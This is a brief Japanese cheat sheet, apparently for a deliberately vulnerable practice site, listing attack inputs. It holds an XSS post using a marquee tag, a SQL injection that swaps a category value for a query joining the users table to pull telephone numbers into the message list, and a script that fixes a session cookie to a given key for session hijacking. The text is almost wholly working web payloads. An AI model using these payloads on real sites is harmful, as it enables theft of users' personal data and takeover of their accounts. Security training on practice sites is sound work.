脆弱サイト
入力コマンド
1 XSS(投稿)
<marquee>ひさじゅのほーむぺーじ</marquee>
- SQLインジェクションカテゴリのvalueを以下に変更
SELECT m.user_id, m.message, u.tel as created_at, m.category FROM messages as m join users as u on u.id = m.user_id order by m.id desc
セッションハイジャック
<script>document.cookie='session_key=a3cde67fd955af54b319678d6e;';</script>